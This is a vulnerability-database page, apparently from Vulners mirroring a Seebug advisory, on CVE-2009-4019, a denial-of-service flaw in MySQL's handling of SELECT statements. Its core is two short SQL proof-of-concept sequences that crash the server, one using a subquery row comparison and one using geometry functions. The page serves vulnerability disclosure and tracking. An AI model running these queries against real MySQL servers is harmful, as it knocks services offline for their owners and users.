Lucene search

K

MySQL SELECT语句处理拒绝服务漏洞

🗓️ 02 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 132 Views

MySQL SELECT statement handling denial of service vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2009-4019
30 Nov 200917:30
nvd
Veracode
Denial Of Service (DoS)
10 Apr 202000:43
veracode
CVE
CVE-2009-4019
30 Nov 200917:30
cve
Cvelist
CVE-2009-4019
30 Nov 200917:00
cvelist
UbuntuCve
CVE-2009-4019
30 Nov 200900:00
ubuntucve
Exploit DB
MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service
23 Nov 200900:00
exploitdb
Exploit DB
MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service
23 Nov 200900:00
exploitdb
Tenable Nessus
Fedora 10 : mysql-5.0.88-1.fc10 (2009-12180)
14 Dec 200900:00
nessus
Tenable Nessus
Fedora 12 : mysql-5.1.41-2.fc12 (2009-13466)
22 Dec 200900:00
nessus
Tenable Nessus
Fedora 11 : mysql-5.1.41-2.fc11 (2009-13504)
22 Dec 200900:00
nessus
Rows per page

                                                drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select  1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`)) 
into @`var0`;


drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values 
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where 
`c0` <>  (select geometrycollectionfromwkb(`c3`) from `t1`);


                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Dec 2009 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.1
132
.json
Report